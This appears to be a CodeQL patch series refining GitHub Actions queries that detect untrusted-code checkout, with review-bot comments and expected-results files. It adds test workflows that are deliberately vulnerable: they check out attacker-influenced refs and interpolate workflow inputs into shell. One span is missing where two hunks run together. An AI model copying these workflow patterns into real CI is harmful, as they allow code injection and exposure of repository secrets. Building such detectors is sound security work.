/repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| 
.github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | 
.github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api 
/repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref 
[head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq 
'.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R 
${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 42d4bb577c84d021f2cca923552f647f9288ff0f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:11 +0200 Subject: [PATCH 608/707] Better identification of checkout of untrusted code depending on the triggering events --- .../codeql/actions/dataflow/FlowSources.qll | 6 +- .../security/OutputClobberingQuery.qll | 3 +- .../actions/security/PoisonableSteps.qll | 7 +- .../security/UntrustedCheckoutQuery.qll | 227 ++++++++---------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../CWE-829/.github/workflows/test21.yml | 27 +++ .../CWE-829/.github/workflows/test22.yml | 62 +++++ .../CWE-829/.github/workflows/test23.yml | 47 ++++ .../UntrustedCheckoutCritical.expected | 3 + .../CWE-829/UntrustedCheckoutHigh.expected | 4 - .../CWE-829/UntrustedCheckoutMedium.expected | 7 - 11 files changed, 250 insertions(+), 144 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 56c901434ce0..e0d46c7196d5 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -90,7 +90,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout 
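Review bot: The new conjunct `uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers()` has no result when the step's enclosing job has no resolvable trigger event, so such a checkout silently stops being a `GitCommandSource` instead of staying a source for the sink to judge; steps inside composite actions (an `action.yml` has no `on:` block) look like that case unless `getEnclosingJob()` resolves through the calling workflow, which this hunk does not show. If dropping them is not intended, widen the gate to `not exists(uses.getEnclosingJob().getATriggerEvent()) or uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers()`, or apply the trigger filter at the query level where the job is always known. The source also still keys only on `ref`; an attacker-influenced `repository:` argument (the shape test23.yml exercises) is an equally untrusted checkout and is not covered here. `GitCommandSource`'s characteristic predicate continues outside the hunk.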
@@ -237,7 +238,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { this.asExpr() = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 311c3abdb691..5850aa91e6e1 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -29,7 +29,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 99d844bae79e..d446c4466410 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
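Review bot: This is now the third copy of the same four-line test (`getCallee() = "actions/checkout"`, `exists(getArgument("ref"))`, `not ...matches("%base%")`, trigger-name gate), spread over `CheckoutSource`, `GitCommandSource` and `OutputClobberingFromFileReadSink`, and the copies will drift the next time the trigger list or the `%base%` heuristic changes. Factor it into one exported predicate next to `checkoutTriggers()`, e.g. `predicate isUntrustedActionsCheckout(UsesStep uses)`, and call it from all three sites. While doing so, note that `not uses.getArgument("ref").matches("%base%")` is a substring test that also excludes refs such as `${{ github.event.pull_request.head.ref || github.base_ref }}`, where the head ref is still attacker-controlled; restricting the exclusion to refs that consist only of a base-ref expression would close that blind spot. Both characteristic predicates continue outside their hunks.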
@@ -17,12 +17,13 @@ class PoisonableCommandStep extends PoisonableStep, Run { class JavascriptImportUsesStep extends PoisonableStep, UsesStep { JavascriptImportUsesStep() { - exists(string script, string line, string import_stmt | + exists(string script, string line | this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and - import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and - import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + // const script = require('${{ github.workspace }}/scripts/test.js'); + // await script({ github, context, core }); + line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 336afdc73b15..621f4b80e1f0 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
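Review bot: The dots in the new pattern `.*(import|require)\\b.*github.workspace\\b.*` are unescaped, so `github.workspace` also matches `github-workspace` or any other single character between the two words; escape them, `line.regexpMatch(".*\\b(import|require)\\b.*\\bgithub\\.workspace\\b.*")`, which also adds the missing leading boundary so `reimport`/`myrequire` do not qualify. Because `line` is one `\n`-split, trimmed line of the script, a `require(` whose path argument sits on the following line is still missed, and the `process.env.GITHUB_WORKSPACE` spelling of the same path is not covered at all; if those are out of scope, say so in the comment, otherwise add them as alternatives. The class continues outside the hunk.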
@@ -3,49 +3,57 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking +string checkoutTriggers() { + result = ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] +} + /** * A taint-tracking configuration for PR HEAD references flowing * into actions/checkout's ref argument. */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - // remote flow sources - source instanceof ArtifactSource - or - source instanceof GitHubCtxSource - or - source instanceof GitHubEventCtxSource - or - source instanceof GitHubEventJsonSource - or - source instanceof MaDSource - or - // `ref` argument contains the PR id/number or head ref - exists(Expression e | - source.asExpr() = e and - ( - containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) + source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + ( + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) ) - ) - or - // 3rd party actions returning the PR head ref - exists(StepsExpression e, UsesStep step | - source.asExpr() = e and - e.getStepId() = step.getId() and - ( - step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" - or - step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "gotson/pull-request-comment-branch" and 
e.getFieldName() = "head_ref" - or - step.getCallee() = "potiuk/get-workflow-origin" and - e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] - or - step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) ) ) } 
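Review bot: `checkoutTriggers()` is now the single gate for every checkout model and for all of `ActionsMutableRefCheckoutConfig::isSource`, yet `["pull_request_target", "workflow_run", "workflow_call", "issue_comment"]` omits events that also run with the base repository's write token while carrying attacker-influenced PR or comment data: `pull_request_review` and `pull_request_review_comment` expose `github.event.pull_request.head.ref`/`.sha` exactly like `pull_request_target`, and `issues` and `discussion_comment` carry attacker-written bodies that workflows resolve into PR refs. If the omission is deliberate, document it; the new predicate has no QLDoc, so add one such as `/** Trigger events whose payload (PR head ref/number, comment body) is attacker-controlled while the job still runs with write permissions and secrets; checkouts and ref sources are only reported under these events. */`. Note also that `isSource` now requires `source.asExpr().getEnclosingJob()` to exist, so a source expression with no resolvable enclosing job is dropped outright rather than left for the sink to decide — confirm that is intended for step outputs and composite-action steps.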
@@ -71,27 +79,32 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global> $GITHUB_OUTPUT + if [[ ${{ github.event.inputs.version }} == 'stable' ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i patch) + else + if [[ $OLD_VERSION == *"rc"* ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i prerelease) + else + # WordPress version guidelines: If minor is 9, bump major instead. + IFS='.' read -r -a OLD_VERSION_ARRAY <<< "$OLD_VERSION" + if [[ ${OLD_VERSION_ARRAY[1]} == "9" ]]; then + NEW_VERSION="$(npx semver $OLD_VERSION -i major)-rc.1" + else + NEW_VERSION="$(npx semver $OLD_VERSION -i minor)-rc.1" + fi + fi + fi + echo "new_version=${NEW_VERSION}" >> $GITHUB_OUTPUT + IFS='.' read -r -a NEW_VERSION_ARRAY <<< "$NEW_VERSION" + RELEASE_BRANCH="release/${NEW_VERSION_ARRAY[0]}.${NEW_VERSION_ARRAY[1]}" + echo "release_branch=${RELEASE_BRANCH}" >> $GITHUB_OUTPUT + + build: + runs-on: ubuntu-latest + needs: bump-version + if: | + always() && ( + github.event_name == 'pull_request' || + github.event_name == 'workflow_dispatch' || + github.repository == 'test/test' + ) + steps: + - name: Checkout code + uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} + + - run: ./bin/build-plugin-zip.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml new file mode 100644 index 000000000000..da889dd2ac6f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml 
@@ -0,0 +1,47 @@ +on: + schedule: + - cron: "0 3 * * 2-6" # Tuesdays - Saturdays, at 3am UTC + workflow_dispatch: + inputs: + pr: + description: "PR Number" + required: false + type: number + release: + types: [ published ] + +jobs: + resolve-required-data: + name: Resolve Required Data + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + outputs: + ref: ${{ steps.script.outputs.ref }} + steps: + - name: Resolve and set checkout and version data to use for release + id: script + uses: actions/github-script@v7 + env: + PR_NUMBER: ${{ github.event.inputs.pr }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js'); + await script({ github, context, core }); + + build: + needs: [ resolve-required-data ] + if: ${{ github.repository_owner == 'test' }} + name: stable + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ needs.resolve-required-data.outputs.repo }} + ref: ${{ needs.resolve-required-data.outputs.ref }} + + - name: Build + shell: bash + run: | + ./cmd + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 237928fc8927..339cd5f6cf40 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -267,6 +267,9 @@ edges
 | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step |
 | .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step |
 | .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step |
+| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step |
+| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step |
+| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step |
 | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step |
 | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step |
 | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step |
